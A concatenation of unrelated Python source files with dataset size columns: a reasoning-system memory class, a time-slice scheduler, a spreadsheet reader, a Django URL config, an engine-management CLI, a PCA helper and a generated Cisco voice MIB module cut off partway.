concept.quest_table.add(task, 0.5)
if task.is_query:
answers = self._solve_query(task, concept)
else:
answers = self._solve_quest(task, concept)
return answers
def _solve_judgement(self, belief: Task, concept: Concept):
'''
It should be ensured that the task has no query-variables.
Args:
task (Task): Its sentence should be a judgement.
concept (Concept): The concept corresponding to the task.
'''
answers = []
# 1. try to solve yn-questions
for question in concept.question_table:
answer = solution_question(question, belief)
if answer is not None: answers.append(answer)
# 2. try to solve wh-questions
sub_terms = belief.term.sub_terms
for sub_term in sub_terms:
concept_term: Concept = self.concepts.take_by_key(sub_term, remove=False)
if concept_term is None: continue
task_link: TaskLink
for task_link in concept_term.task_links:
query = task_link.target
if query is None: continue
if not query.is_query: continue
if not query.term.equal(belief.term): continue
answer = solution_query(query, belief)
if answer is not None: answers.append(answer)
return answers
def _solve_question(self, question: Task, concept: Concept):
'''
Args:
task (Task): Its sentence should be a question.
concept (Concept): The concept corresponding to the task.
'''
answers = []
# 1. try to solve yn-questions
belief_answer: Belief = concept.match_belief(question.sentence)
if belief_answer is not None:
answer = solution_question(question, belief_answer)
if answer is not None: answers.append(answer)
return answers
def _solve_query(self, query: Task, concept: Concept):
'''
Args:
task (Task): Its sentence should be a question or a quest and contains query-variable(s).
concept (Concept): The concept corresponding to the task.
'''
answers = []
# 1. try to solve wh-questions
if query.is_question:
sub_terms = query.term.sub_terms
for sub_term in sub_terms:
if sub_term.is_qvar: continue
concept_term: Concept = self.concepts.take_by_key(sub_term, remove=False)
if concept_term is None: continue
task_link: TaskLink
for task_link in concept_term.task_links:
concept_target: Concept = self.concepts.take_by_key(task_link.target.term, False)
if concept_target is None: continue
if not query.term.equal(concept_target.term): continue
subst = unification__var_const(query.term, concept_target.term, [], [])
if not subst.is_qvar_valid: continue
# if not (concept_target.term.equal(query.term) and subst is not None): continue
for belief in concept_target.belief_table:
answer = solution_query(query, belief)
if answer is not None: answers.append(answer)
pass
elif query.is_quest:
pass
else: raise "Invalid case."
return answers
def _solve_goal(self, task: Task, concept: Concept):
'''
Args:
task (Task): Its sentence should be a goal.
concept (Concept): The concept corresponding to the task.
'''
def _solve_quest(self, task: Task, concept: Concept):
'''
Args:
task (Task): Its sentence should be a quest.
concept (Concept): The concept corresponding to the task.
'''
answers = []
return answers
def take(self, remove=True) -> Concept:
'''
Take out a concept according to priority.
'''
return self.concepts.take(remove)
def take_by_key(self, key: Task, remove=True) -> Concept:
return self.concepts.take_by_key(key, remove)
def put(self, concept: Concept):
return self.concepts.put(concept)
def put_back(self, concept: Concept):
return self.concepts.put_back(concept)
def __repr__(self) -> str:
return f"<{self.__class__.__name__}: #items={len(self.concepts)}, #buckets={len(self.concepts.levels)}>"
def __len__(self) -> int:
return len(self.concepts) | 11,206 | 3,124 |
# coding=utf-8
"""实现时间片算法"""
from __future__ import unicode_literals, absolute_import
from fn.fn_loop import LoopContext
from fn.fn_eval import EvalContext
from collections import deque
class TimeSliceEngine(object):
def __init__(self):
# 运行上下文保存在这里面,切换时从里面开始切换,里面都应该是可执行的函数
# 上下文应当是一个可循环、可修改(运行结束的就可以踢出去了)的数据结构
self.context = deque()
def run(self):
"""运行核心:
只要所有上下文没有为空,那么从上下文中取一个出来
使用具体实现的方法,执行一下
如果上下文 尚未完结,那么从右边塞回去,继续
"""
while self.context:
# 因为是从右边进入的,所以从左侧pop,表达一种FIFO
this_context = self.context.popleft()
self.eval_context(this_context)
def eval_context(self, context):
raise NotImplemented
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""所以时间调度本质上就是在退出with块的时候开始执行
"""
self.run()
def for_loop(self, iterable):
ctx = LoopContext(
iterable
)
# 从右边加入
self.context.append(ctx)
return ctx
def call(self, fn, *args, **kwargs):
ctx = EvalContext(fn, *args, **kwargs)
self.context.append(ctx)
return ctx
class TimeCountEngine(TimeSliceEngine):
"""
按次数分配
函数:需要运行的次数
A:10
B:8
C:4
将会按照运行A 5次,B 5次,C 4次 A 5次,B3次 的顺序将他们执行完
"""
def __init__(self, swith_every=1):
"""
>>>
"""
self.swith_every = swith_every
return super(TimeCountEngine, self).__init__()
def eval_context(self, context):
count = 0
while not context.done():
# 执行一次上下文,然后加一个计数
context()
count += 1
# 运行次数达到了,塞回去,然后break
if count >= self.swith_every:
self.context.append(context)
break
# 没达到 则继续执行,计数+1
| 1,861 | 810 |
import re
import xlrd
DATA_BASE_PATH = '../data/population-migration-all/'
def get_files(file_path):
"""get files.
Keyword arguments:
file_path -- file path
"""
result = []
work_book = xlrd.open_workbook(file_path)
first_table = work_book.sheet_by_index(0)
cols = first_table.ncols
title_row = first_table.row_values(0)
source_col_index = title_row.index('来源')
for i in range(first_table.nrows):
row_values = first_table.row_values(i)
if row_values[source_col_index] == '中华人民共和国人口统计资料汇编':
result.append(row_values[cols - 1])
return result
def get_file_content(file_path):
work_book = xlrd.open_workbook(file_path)
table = work_book.sheet_by_index(0)
area = get_area(table.row_values(0, 0, 1)[0])[0]
data_list = []
for i in range(7, table.nrows):
year = table.row_values(i, 0, 1)[0]
if year.isdigit():
data_list.append(table.row_values(i))
return area, data_list
def get_area(line):
return re.findall(r'年(.*?)历年', line, re.U | re.I)
| 1,079 | 428 |
from django.urls import path
from . import views
app_name = "analytics"
urlpatterns = [
path('', views.AnalyticsView.as_view(), name="analytics"),
]
| 156 | 53 |
from _luxem import Reader, to_ascii16, from_ascii16
from luxem.struct import Typed
from luxem.read import load
loads = load
from luxem.write import dump, dumps, Writer
| 168 | 59 |
#!/usr/bin/env python3
from harness import EnginesClient, HttpError
from common import *
engine_client = EnginesClient(
url=url,
user_id=client_user_id,
user_secret=client_user_secret
)
if args.action == 'create':
with open(args.config) as data_file:
config = json.load(data_file)
try:
res = engine_client.create(config)
print_success(res, 'Created new engine: \n')
except HttpError as err:
print_failure(err, 'Error creating new engine\n')
elif args.action == 'update':
engine_id, config = id_and_config()
# print("Engine-id: " + engine_id)
# print("Json config: \n" + str(config))
try:
res = engine_client.update(engine_id=engine_id, import_path=args.import_path, update_type="configs", data=config)
# print_success_string('Updating engine-id: {} \n'.format(engine_id))
print_success(res, 'Updating engine: \n')
except HttpError as err:
print_failure(err, 'Error updating engine-id: {}\n'.format(engine_id))
# with open(args.config) as data_file:
# config = json.load(data_file)
# engine_id = config.engine_id
# try:
# res = engine_client.update(config)
# print_success(res, 'Updating engine: ')
# except HttpError as err:
# print_failure(err, 'Error updating engine\n')
# engine_id, config = id_or_config()
# try:
# res = engine_client.update(engine_id, config, args.delete, args.force, args.input)
# print_success(res, 'Updating existing engine. Success:\n')
# except HttpError as err:
# print_failure(err, 'Error updating engine.')
elif args.action == 'import':
engine_id = args.engine_id
# print("Import path: {}".format(args.import_path))
try:
res = engine_client.update(engine_id=engine_id, import_path=args.import_path, update_type="imports", data={})
print_success(res, 'Importing to engine: {}\n'.format(engine_id))
except HttpError as err:
print_failure(err, 'Error importing to engine-id: {} from {}\n'.format(engine_id, args.import_path))
# else:
# print_failure(None, "Error: no input for import command.")
elif args.action == 'train':
engine_id = args.engine_id
# print("Import path: {}".format(args.import_path))
try:
res = engine_client.update(engine_id=engine_id, import_path=args.import_path, update_type="jobs", data={})
print_success(res, 'Asking engine: {} to train\n'.format(engine_id))
except HttpError as err:
print_failure(err, 'Error requesting engine: {} to train\n'.format(engine_id))
# else:
# print_failure(None, "Error: no input for import command.")
elif args.action == 'delete':
engine_id, config = id_or_config()
try:
res = engine_client.delete(engine_id=engine_id)
print_success_string('Deleted engine-id: {} \n'.format(engine_id))
except HttpError as err:
print_failure(err, 'Error deleting engine-id: {}\n'.format(engine_id))
elif args.action == 'status':
engine_id = args.engineid
try:
if engine_id is not None:
res = engine_client.get(engine_id=engine_id)
# print(str(res))
print_success(res, 'Status for engine-id: {}\n'.format(engine_id))
else:
res = engine_client.get(engine_id=None)
# print(str(res))
print_success(res, 'Status for all Engines:\n')
except HttpError as err:
print_failure(err, 'Error getting status.\n')
else:
print_warning("Unknown action: %{}".format(args.action))
| 3,635 | 1,154 |
# Author: Thomas Dorfer <thomas.a.dorfer@gmail.com>
import warnings
import numpy as np
from sklearn.decomposition import PCA
def pca(X, *, thres=.9, whiten=False):
"""Principal component analysis.
PCA is defined as an orthogonal linear transformation that transforms the
data to a new coordinate system such that the greatest variance by some
scalar projection of the data comes to lie on the first coordinate (called
the first principal component), the second greatest variance on the second
coordinate, and so on.
Parameters
----------
X : ndarray of shape (n_samples, n_features_pre)
Feature matrix.
thres : float, default=.9
Specify the desired explained variance.
Returns
-------
arr : ndarray of shape (n_samples, n_features_post)
Array containing the PCA components comprising the specified variance.
Notes
-----
For the output to be meaningful, the number of samples should be larger than
the number of features.
Examples
--------
>>> from protlearn.dimreduction import pca
>>> features.shape #from a larger dataset (not shown here)
(1000, 575)
>>> reduced = pca(features, thres=.9)
(1000, 32)
"""
# check input dimensionality
if X.shape[0] < X.shape[1]:
warnings.warn("The number of samples (%i) is less than the number of "
"features (%i). Therefore, the PCA output may not be "
"meaningful." % (X.shape[0], X.shape[1]))
# fit and transform PCA
pca = PCA(whiten=whiten).fit(X)
var = pca.explained_variance_ratio_[0]
comp = 1
while var <= thres:
var += pca.explained_variance_ratio_[comp]
comp += 1
arr = pca.transform(X)
return arr[:,:comp] | 1,817 | 558 |
#
# PySNMP MIB module CISCO-VOICE-COMMON-DIAL-CONTROL-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-VOICE-COMMON-DIAL-CONTROL-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:51:02 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint")
cCallHistoryIndex, = mibBuilder.importSymbols("CISCO-DIAL-CONTROL-MIB", "cCallHistoryIndex")
ciscoExperiment, = mibBuilder.importSymbols("CISCO-SMI", "ciscoExperiment")
callActiveSetupTime, callActiveIndex = mibBuilder.importSymbols("DIAL-CONTROL-MIB", "callActiveSetupTime", "callActiveIndex")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Gauge32, TimeTicks, MibIdentifier, Integer32, Bits, Unsigned32, ObjectIdentity, ModuleIdentity, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, NotificationType, Counter64, IpAddress, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "TimeTicks", "MibIdentifier", "Integer32", "Bits", "Unsigned32", "ObjectIdentity", "ModuleIdentity", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "NotificationType", "Counter64", "IpAddress", "iso")
DisplayString, TextualConvention, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "TruthValue")
ciscoVoiceCommonDialControlMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 10, 55))
ciscoVoiceCommonDialControlMIB.setRevisions(('2010-06-30 00:00', '2009-03-18 00:00', '2008-07-02 00:00', '2007-06-26 00:00', '2005-08-16 00:00', '2005-03-06 00:00', '2003-03-11 00:00', '2001-10-06 00:00', '2001-09-05 00:00', '2000-07-22 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setRevisionsDescriptions(('Added CvcCallReferenceIdOrZero textual convention. Added aaclc and aacld enum to CvcCoderTypeRate and CvcSpeechCoderRate textual conventions.', '[1] Added acronym for iSAC codec [2] Added iSAC enum to CvcSpeechCoderRate and CvcCoderTypeRate textual conventions.', "[1] Added '-- obsolete' to description of 'g722' enum from CvcCoderTypeRate. [2] Added new enum values 'g722r4800', 'g722r5600' and 'g722r6400' to CvcCoderTypeRate. [3] Added new enum values 'g722r4800', 'g722r5600' and 'g722r6400' to CvcSpeechCoderRate.", '[1] Imported TEXTUAL-CONVENTION from SNMPv2-TC. [2] Added acronyms for GSM AMR-NB and iLBC codecs [3] Added llcc, gsmAmrNb, iLBC, iLBCr15200 and iLBCr13330 enums to CvcSpeechCoderRate textual conventions. [4] Added llcc, gsmAmrNb, g722, iLBC, iLBCr15200 and iLBCr13330 enums to CvcCoderTypeRate textual conventions. [5] Added REFERENCE clause to CvcSpeechCoderRate and CvcCoderTypeRate textual conventions for GSM AMR-NB and iLBC codecs.', 'Added CvcH320CallType and CvcVideoCoderRate objects. Added g722 enum to CvcCoderTypeRate textual conventions.', 'Added gsmAmrNb enum to CvcSpeechCoderRate and CvcCoderTypeRate textual conventions.', "Added new enum value 'llcc', to CvcSpeechCoderRate and CvcCoderTypeRate textual-conventions.", "[1] Added new enum value 'g726r40000',to CvcSpeechCoderRate's and CvcCoderTypeRate's textual-conventions. [2] Replaced 'clearch' enum with 'clearChannel' enum. [3] Replaced 'codec is disabled' comment for clearChannel enum with 'CLEAR channel codec'.", "[1] Added new enum value, 'clearch,' to CvcSpeechCoderRate's and CvcCoderTypeRate's textual-conventions. [2] Added new enum value, 'gr303,' to CvcInBandSignaling's textual-conventions [3] Modified cvCommonDcCallActiveInBandSignaling's and cvCommonDcCallHistoryInBandSignaling's description to indicate value is valid only for Connection Trunk calls.", 'Add new objects for handling the following features: [1] Calling Name display for call active and history table. [2] Caller ID Block, which indicates whether the Caller ID feature is in using, for call active and history table.',))
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setLastUpdated('201006300000Z')
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setContactInfo('Cisco Systems Customer Service Postal: 170 W. Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: cs-voice@cisco.com')
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setDescription('This MIB module contains voice related objects that are common across more than one network encapsulation i.e VoIP, VoATM and VoFR. *** ABBREVIATIONS, ACRONYMS AND SYMBOLS *** GSM - Global System for Mobile Communication AMR-NB - Adaptive Multi Rate - Narrow Band iLBC - internet Low Bitrate Codec iSAC - internet Speech Audio Codec')
cvCommonDcMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 1))
cvCommonDcCallActive = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1))
cvCommonDcCallHistory = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2))
class CvcSpeechCoderRate(TextualConvention, Integer32):
reference = '[1] RFC 3267: For introduction about GSM AMR-NB codec, section 3.1 [2] RFC 3952: For introduction about iLBC codec, section 2'
description = 'This object specifies the most desirable codec of speech for the VoIP, VoATM or VoFR peer. g729r8000 - pre-IETF G.729 8000 bps g729Ar8000 - G.729 ANNEX-A 8000 bps g726r16000 - G.726 16000 bps g726r24000 - G.726 24000 bps g726r32000 - G.726 32000 bps g711ulawr64000 - G.711 u-Law 64000 bps g711Alawr64000 - G.711 A-Law 64000 bps g728r16000 - G.728 16000 bps g723r6300 - G.723.1 6300 bps g723r5300 - G.723.1 5300 bps gsmr13200 - GSM Full rate 13200 bps g729Br8000 - G.729 ANNEX-B 8000 bps g729ABr8000 - G.729 ANNEX-A & B 8000 bps g723Ar6300 - G723.1 Annex A 6300 bps g723Ar5300 - G723.1 Annex A 5300 bps g729IETFr8000 - IETF G.729 8000 bps gsmeEr12200 - GSM Enhanced Full Rate 12200 bps clearChannel - CLEAR Channel codec g726r40000 - G.726 40000 bps llcc - Lossless compression codec gsmAmrNb - GSM AMR-NB 4750 - 12200 bps iLBC - iILBC 13330 or 15200 bps iLBCr15200 - iLBC 15200 bps iLBCr13330 - iLBC 13330 bps g722r4800 - G.722 (modes 1, 2, 3) g722r5600 - G.722 (modes 1, 2) g722r6400 - G.722 (mode 1) iSAC - iSAC (10 to 32 kbps) aaclc - AAC-LC Advanced Audio Coding Low Complexity aacld - AAC-LD MPEG-4 Low Delay Audio Coder'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30))
namedValues = NamedValues(("g729r8000", 1), ("g729Ar8000", 2), ("g726r16000", 3), ("g726r24000", 4), ("g726r32000", 5), ("g711ulawr64000", 6), ("g711Alawr64000", 7), ("g728r16000", 8), ("g723r6300", 9), ("g723r5300", 10), ("gsmr13200", 11), ("g729Br8000", 12), ("g729ABr8000", 13), ("g723Ar6300", 14), ("g723Ar5300", 15), ("g729IETFr8000", 16), ("gsmeEr12200", 17), ("clearChannel", 18), ("g726r40000", 19), ("llcc", 20), ("gsmAmrNb", 21), ("iLBC", 22), ("iLBCr15200", 23), ("iLBCr13330", 24), ("g722r4800", 25), ("g722r5600", 26), ("g722r6400", 27), ("iSAC", 28), ("aaclc", 29), ("aacld", 30))
class CvcFaxTransmitRate(TextualConvention, Integer32):
description = "This object specifies the default transmit rate of FAX for the VoIP, VoATM or VOFR peer. If the value of this object is 'none', then the Fax relay feature is disabled ; otherwise the Fax relay feature is enabled. none - Fax relay is disabled. voiceRate - the fastest possible fax rate not exceed the configured voice rate. fax2400 - 2400 bps FAX transmit rate. fax4800 - 4800 bps FAX transmit rate. fax7200 - 7200 bps FAX transmit rate. fax9600 - 9600 bps FAX transmit rate. fax14400 - 14400 bps FAX transmit rate. fax12000 - 12000 bps FAX transmit rate."
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8))
namedValues = NamedValues(("none", 1), ("voiceRate", 2), ("fax2400", 3), ("fax4800", 4), ("fax7200", 5), ("fax9600", 6), ("fax14400", 7), ("fax12000", 8))
class CvcCoderTypeRate(TextualConvention, Integer32):
reference = '[1] RFC 3267: For introduction about GSM AMR-NB codec, section 3.1 [2] RFC 3952: For introduction about iLBC codec, section 2'
description = 'Represents the coder type-rate for voice/fax compression used during a call. *** ABBREVIATIONS, ACRONYMS AND SYMBOLS *** GSM - Global System for Mobile Communication AMR-NB - Adaptive Multi Rate - Narrow Band iLBC - internet Low Bitrate Codec iSAC - internet Speech Audio Codec other - none of the following. fax2400 - FAX 2400 bps fax4800 - FAX 4800 bps fax7200 - FAX 7200 bps fax9600 - FAX 9600 bps fax14400 - FAX 14400 bps fax12000 - FAX 12000 bps g729r8000 - G.729 8000 bps (pre-IETF bit ordering) g729Ar8000 - G.729 ANNEX-A 8000 bps g726r16000 - G.726 16000 bps g726r24000 - G.726 24000 bps g726r32000 - G.726 32000 bps g711ulawr64000 - G.711 u-Law 64000 bps g711Alawr64000 - G.711 A-Law 64000 bps g728r16000 - G.728 16000 bps g723r6300 - G.723.1 6300 bps g723r5300 - G.723.1 5300 bps gsmr13200 - GSM full rate 13200 bps g729Br8000 - G.729 ANNEX-B 8000 bps g729ABr8000 - G.729 ANNEX-A & B 8000 bps g723Ar6300 - G723.1 Annex A 6300 bps g723Ar5300 - G723.1 Annex A 5300 bps ietfg729r8000 - G.729 8000 bps (IETF bit ordering) gsmeEr12200 - GSM Enhanced Full Rate 12200 bps clearChannel - CLEAR channel codec g726r40000 - G.726 40000 bps llcc - Lossless compression codec gsmAmrNb - GSM AMR-NB 4750 - 12200 bps g722 - G.722 2400 - 6400 bps iLBC - iILBC 13330 or 15200 bps iLBCr15200 - iLBC 15200 bps iLBCr13330 - iLBC 13330 bps g722r4800 - G.722 (modes 1, 2, 3) g722r5600 - G.722 (modes 1, 2) g722r6400 - G.722 (mode 1) iSAC - iSAC (10 to 32 kbps) aaclc - AAC-LC Advanced Audio Coding Low Complexity aacld - AAC-LD MPEG-4 Low Delay Audio Coder'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40))
namedValues = NamedValues(("other", 1), ("fax2400", 2), ("fax4800", 3), ("fax7200", 4), ("fax9600", 5), ("fax14400", 6), ("fax12000", 7), ("g729r8000", 10), ("g729Ar8000", 11), ("g726r16000", 12), ("g726r24000", 13), ("g726r32000", 14), ("g711ulawr64000", 15), ("g711Alawr64000", 16), ("g728r16000", 17), ("g723r6300", 18), ("g723r5300", 19), ("gsmr13200", 20), ("g729Br8000", 21), ("g729ABr8000", 22), ("g723Ar6300", 23), ("g723Ar5300", 24), ("ietfg729r8000", 25), ("gsmeEr12200", 26), ("clearChannel", 27), ("g726r40000", 28), ("llcc", 29), ("gsmAmrNb", 30), ("g722", 31), ("iLBC", 32), ("iLBCr15200", 33), ("iLBCr13330", 34), ("g722r4800", 35), ("g722r5600", 36), ("g722r6400", 37), ("iSAC", 38), ("aaclc", 39), ("aacld", 40))
class CvcGUid(TextualConvention, OctetString):
description = 'Represents a Global Call Identifier. The global call identifier is used as an unique identifier for an end-to-end call. A zero length CvcGUid indicates no value for the global call identifier.'
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(0, 16)
class CvcInBandSignaling(TextualConvention, Integer32):
description = 'Represents the type of in-band signaling used between the two end points of the call and is used to inform the router how interpret the ABCD signaling data bits passed as part of the voice payload data. cas - specifies interpret the signaling bits as North American Channel Associated signaling. none - specifies no in-band signaling or signaling is being done via an external method (e.g CCS). cept - specifies interpret the signaling bits as MELCAS transparent - specifies do not interpret or translate the signaling bits. gr303 - specifies interpret the signaling bits as GR303'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("cas", 1), ("none", 2), ("cept", 3), ("transparent", 4), ("gr303", 5))
class CvcCallReferenceIdOrZero(TextualConvention, Unsigned32):
description = 'A call reference ID correlates the video and audio call entries that belong to the same endpoint. In other words, if an audio call entry and a video call entry have the same call reference ID, these entries belong to the same endpoint. Because an audio-only endpoint creates only one call entry, call reference ID is not necessary and is set to zero. A call reference ID with value greater than zero signifies a video call, the value zero is object-specific and must therefore be defined as part of the description of any object which uses this syntax. Examples of the usage of zero include audio calls.'
status = 'current'
class CvcH320CallType(TextualConvention, Integer32):
description = 'This object specifies the H320 call type of a voice call.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2))
namedValues = NamedValues(("none", 0), ("primary", 1), ("secondary", 2))
class CvcVideoCoderRate(TextualConvention, Integer32):
description = 'This object specifies the encoding type used to compress the video data of the voice call.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4))
namedValues = NamedValues(("none", 0), ("h261", 1), ("h263", 2), ("h263plus", 3), ("h264", 4))
cvCommonDcCallActiveTable = MibTable((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1), )
if mibBuilder.loadTexts: cvCommonDcCallActiveTable.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveTable.setDescription('This table is a common extension to the call active table of IETF Dial Control MIB. It contains common call leg information about a network call leg.')
cvCommonDcCallActiveEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1), ).setIndexNames((0, "DIAL-CONTROL-MIB", "callActiveSetupTime"), (0, "DIAL-CONTROL-MIB", "callActiveIndex"))
if mibBuilder.loadTexts: cvCommonDcCallActiveEntry.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveEntry.setDescription('The common information regarding a single network call leg. The call leg entry is identified by using the same index objects that are used by Call Active table of IETF Dial Control MIB to identify the call. An entry of this table is created when its associated call active entry in the IETF Dial Control MIB is created and the call active entry contains information for the call establishment to a network dialpeer. The entry is deleted when its associated call active entry in the IETF Dial Control MIB is deleted.')
cvCommonDcCallActiveConnectionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 1), CvcGUid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveConnectionId.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveConnectionId.setDescription('The global call identifier for the network call.')
cvCommonDcCallActiveVADEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveVADEnable.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveVADEnable.setDescription('The object indicates whether or not the VAD (Voice Activity Detection) is enabled for the voice call.')
cvCommonDcCallActiveCoderTypeRate = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 3), CvcCoderTypeRate()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveCoderTypeRate.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveCoderTypeRate.setDescription('The negotiated coder rate. It specifies the transmit rate of voice/fax compression to its associated call leg for the call. This rate is different from the configuration rate because of rate negotiation during the call.')
cvCommonDcCallActiveCodecBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveCodecBytes.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveCodecBytes.setDescription('Specifies the payload size of the voice packet.')
cvCommonDcCallActiveInBandSignaling = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 5), CvcInBandSignaling()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveInBandSignaling.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveInBandSignaling.setDescription('Specifies the type of in-band signaling being used on the call. This object is instantiated only for Connection Trunk calls.')
cvCommonDcCallActiveCallingName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 6), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveCallingName.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveCallingName.setDescription('The calling party name this call is connected to. If the name is not available, then it will have a length of zero.')
cvCommonDcCallActiveCallerIDBlock = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1, 1, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallActiveCallerIDBlock.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallActiveCallerIDBlock.setDescription('The object indicates whether or not the caller ID feature is blocked for this voice call.')
cvCommonDcCallHistoryTable = MibTable((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1), )
if mibBuilder.loadTexts: cvCommonDcCallHistoryTable.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryTable.setDescription('This table is the Common extension to the call history table of IETF Dial Control MIB. It contains Common call leg information about a network call leg.')
cvCommonDcCallHistoryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1), ).setIndexNames((0, "CISCO-DIAL-CONTROL-MIB", "cCallHistoryIndex"))
if mibBuilder.loadTexts: cvCommonDcCallHistoryEntry.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryEntry.setDescription('The common information regarding a single network call leg. The call leg entry is identified by using the same index objects that are used by Call Active table of IETF Dial Control MIB to identify the call. An entry of this table is created when its associated call history entry in the IETF Dial Control MIB is created and the call history entry contains information for the call establishment to a network dialpeer. The entry is deleted when its associated call history entry in the IETF Dial Control MIB is deleted.')
cvCommonDcCallHistoryConnectionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 1), CvcGUid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryConnectionId.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryConnectionId.setDescription('The global call identifier for the gateway call.')
cvCommonDcCallHistoryVADEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryVADEnable.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryVADEnable.setDescription('The object indicates whether or not the VAD (Voice Activity Detection) was enabled for the voice call.')
cvCommonDcCallHistoryCoderTypeRate = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 3), CvcCoderTypeRate()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryCoderTypeRate.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryCoderTypeRate.setDescription('The negotiated coder rate. It specifies the transmit rate of voice/fax compression to its associated call leg for the call. This rate is different from the configuration rate because of rate negotiation during the call.')
